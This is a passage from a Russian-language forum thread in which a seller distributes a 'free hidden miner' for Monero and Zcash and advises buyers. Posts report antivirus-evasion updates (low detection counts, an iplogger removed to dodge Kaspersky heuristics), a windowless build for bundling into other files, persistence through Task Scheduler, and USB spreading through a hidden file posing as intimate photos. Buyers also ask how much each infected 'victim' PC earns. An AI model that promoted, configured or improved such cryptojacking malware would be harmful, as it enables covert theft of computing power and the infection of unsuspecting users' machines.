Pages:
Author

Topic: Бесплатный скрытый майнер Monero+Zcash - page 5. (Read 3388 times)

newbie
Activity: 7
Merit: 0
Коллеги, я правильно понимаю, что майнится на видеокартах, или на процах? И если на процах, то есть ли сборка без майнинга на видеокартах?

Майнится и на проце и на видеокарте, если видеокарта не подходит, то только проц. Напиши в лс, могу сборку под тебя сделать.

В личку написал, но ответа нет. Вероятно блокируется из-за того, что я новичек на форуме.
newbie
Activity: 6
Merit: 0
Можно ли как-то настроить майнинг на кошелек Майнергейта?
в pool.cnf пиши
stratum+tcp://xmr.pool.minergate.com:45560

в m.cnf почту

а в чем может быть проблема, если на пул хэши не идут? какие могут быть варианты?
newbie
Activity: 95
Merit: 0
Можно ли как-то настроить майнинг на кошелек Майнергейта?
в pool.cnf пиши
stratum+tcp://xmr.pool.minergate.com:45560

в m.cnf почту
newbie
Activity: 6
Merit: 0
Можно ли как-то настроить майнинг на кошелек Майнергейта?
newbie
Activity: 95
Merit: 0
Ребят а подскажите пожалуйста как проверить стоит ли у меня майнер? ноут работает сутками последнее время начал проц работать на износ !

Нагрузку смотри сторонними прогами. Поставь антивирус. Смотри автозапуск. Фаервол поставь и смотри какие проги куда конектятся.
member
Activity: 448
Merit: 10
Ребят а подскажите пожалуйста как проверить стоит ли у меня майнер? ноут работает сутками последнее время начал проц работать на износ !
newbie
Activity: 95
Merit: 0
Коллеги, я правильно понимаю, что майнится на видеокартах, или на процах? И если на процах, то есть ли сборка без майнинга на видеокартах?

Майнится и на проце и на видеокарте, если видеокарта не подходит, то только проц. Напиши в лс, могу сборку под тебя сделать.
newbie
Activity: 7
Merit: 0
Коллеги, я правильно понимаю, что майнится на видеокартах, или на процах? И если на процах, то есть ли сборка без майнинга на видеокартах?
full member
Activity: 518
Merit: 161
Эт понятно что от количества, можешь примерно сказать например с одного компа в месяц что капает по монетам? Просто хочется для себя понимать


Монеро 1-4$ в месяц, зек 0-30$
Благодарю. А параметры компа играют значительную роль? Возможно вопрос глупый, но я майнингом не занимался и пока что далек от этого, поэтому интересуюсь
newbie
Activity: 95
Merit: 0
Эт понятно что от количества, можешь примерно сказать например с одного компа в месяц что капает по монетам? Просто хочется для себя понимать


Монеро 1-4$ в месяц, зек 0-30$
full member
Activity: 518
Merit: 161
Интересная фишка) Мужики кто юзает подскажите какой примерно выхлоп идет и какое количество машин задействовано... Особенно интересная тема насчет флешки и интим фото)

Работает нормально, ну тут нужно понимать, что все зависит от количества.

Насчёт интим фото, это очень годная фишка.
Если у жертвы запущен Майнер, то как вставится флешка, то там создаётся скрытый файл и стартер
Эт понятно что от количества, можешь примерно сказать например с одного компа в месяц что капает по монетам? Просто хочется для себя понимать
newbie
Activity: 95
Merit: 0
Сборка обновлена. Снижен детект, на момент публикации 2/32.

Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.
newbie
Activity: 28
Merit: 0
Интересная фишка) Мужики кто юзает подскажите какой примерно выхлоп идет и какое количество машин задействовано... Особенно интересная тема насчет флешки и интим фото)

Работает нормально, ну тут нужно понимать, что все зависит от количества.

Насчёт интим фото, это очень годная фишка.
Если у жертвы запущен Майнер, то как вставится флешка, то там создаётся скрытый файл и стартер
full member
Activity: 518
Merit: 161
Интересная фишка) Мужики кто юзает подскажите какой примерно выхлоп идет и какое количество машин задействовано... Особенно интересная тема насчет флешки и интим фото)
newbie
Activity: 95
Merit: 0
Сборка обновлена. Снижен детект.
Пришлось убрать iplogger из-за которого срабатывал эвристический анализ каспера

Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.
newbie
Activity: 28
Merit: 0
бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится.

Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится.

http://rgho.st/858g4BqnT BTC


В чём он палится? В чём отличия?

он прописывается в сценарий автозапуска, при этом полностью не палится

Имеешь ввиду планировщик заданий, чтобы в автозагрузке ничего не было? Тогда могут быть проблемы с правами.


Я говорю, его, когда его ставишь, он прописывается в планировщик, так же я заметил, что его Аваст вообще не палит
newbie
Activity: 95
Merit: 0
бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится.

Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится.

http://rgho.st/858g4BqnT BTC


В чём он палится? В чём отличия?

он прописывается в сценарий автозапуска, при этом полностью не палится

Имеешь ввиду планировщик заданий, чтобы в автозагрузке ничего не было? Тогда могут быть проблемы с правами.
newbie
Activity: 28
Merit: 0
бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится.

Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится.

http://rgho.st/858g4BqnT BTC


В чём он палится? В чём отличия?

он прописывается в сценарий автозапуска, при этом полностью не палится
newbie
Activity: 95
Merit: 0
Сборка обновлена. Снижен детект
Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.
brand new
Activity: 0
Merit: 0
Как обратно в sys вернутьHuh? Уже все что мог сделал(((( Какие способы есть?

Параметры папок, там где вид смотри, там в конце 5 вроде пунктов, со всех галки убери

Разобрался) Спасибо!
Pages:
Jump to: